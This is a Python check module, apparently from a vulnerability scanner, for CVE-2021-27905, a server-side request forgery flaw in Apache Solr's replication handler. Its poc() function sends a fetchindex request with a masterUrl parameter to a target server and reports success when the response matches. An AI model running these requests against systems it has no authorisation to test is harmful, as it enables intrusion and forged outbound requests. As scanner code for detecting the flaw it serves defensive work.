import requests
# Vuln Base Info
def info():
    """Return the static advisory record for this check (CVE-2021-27905).

    The dict holds the advisory title, description, references, CVSS/CWE
    classification, metadata and tags. ``poc`` attaches it to its result
    under the ``"info"`` key when the check matches.
    """
    references = [
        "https://www.anquanke.com/post/id/238201",
        "https://ubuntu.com/security/CVE-2021-27905",
        "https://nvd.nist.gov/vuln/detail/CVE-2021-27905",
        "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/",
    ]
    classification = {
        "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cvss-score": "",  # left blank in the original record
        "cve-id": "CVE-2021-27905",
        "cwe-id": "CWE-918",
    }
    record = {
        "author": "cckuailong",
        "name": '''Apache Solr <= 8.8.1 SSRF''',
        "description": '''The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.''',
        "severity": "critical",
    }
    record["references"] = references
    record["classification"] = classification
    record["metadata"] = {"vuln-target": ""}
    record["tags"] = ["cve", "cve2021", "apache", "solr", "ssrf"]
    return record
# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook; this check performs none and always returns True.

    ``url`` is accepted for interface compatibility only and is not inspected.
    """
    del url  # unused: no request is made and nothing is matched
    return True
# Proof of Concept
def poc(url: str) -> dict:
    """Send the CVE-2021-27905 check requests to *url* and report the outcome.

    Returns a dict. ``"success"`` is True only when the replication response
    body contains ``<str name="status">OK</str>``; then ``"info"`` (the advisory
    record) and ``"payload"`` (the request URL) are also set. If the body does
    not match, the dict is returned empty. On any exception it is
    ``{"success": False}``.
    """
    result = {}
    try:
        url = format_url(url)
        # First request: core listing. Its response (resp0) is never read
        # afterwards, so nothing from it feeds the second request.
        path = """/solr/admin/cores?wt=json"""
        method = "GET"
        data = """"""
        headers = {'Accept-Language': 'en', 'Connection': 'close'}
        # verify=False disables TLS certificate validation for these requests;
        # allow_redirects=False keeps any redirect from being followed.
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
        # NOTE(review): "{{core}}" is a literal placeholder in this path; it is
        # sent unchanged because nothing in this function substitutes it.
        path = """/solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com"""
        method = "GET"
        data = """"""
        headers = {'Accept-Language': 'en', 'Connection': 'close'}
        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
        # Match on the ReplicationHandler's status element in the response body.
        if ("""<str name="status">OK</str>""" in resp1.text):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path
    # NOTE(review): a bare except also swallows connection/TLS errors and
    # KeyboardInterrupt; the caller cannot tell a failed request from a
    # negative result beyond success=False.
    except:
        result["success"] = False
    return result
# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; delegates entirely to ``poc`` and returns its result dict."""
    outcome = poc(url)
    return outcome
# Utils
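def format_url(url):
    """Normalise a target string into a scheme-prefixed URL with no trailing slash.

    Args:
        url: Host, host:port, or full URL. Surrounding whitespace is ignored.

    Returns:
        ``url`` stripped of whitespace, prefixed with ``http://`` when it does
        not already start with ``http://`` or ``https://`` (compared
        case-insensitively), and with trailing slashes removed.
    """
    url = url.strip()
    # URL schemes are case-insensitive, so "HTTPS://host" must not get a
    # second "http://" prepended in front of it.
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")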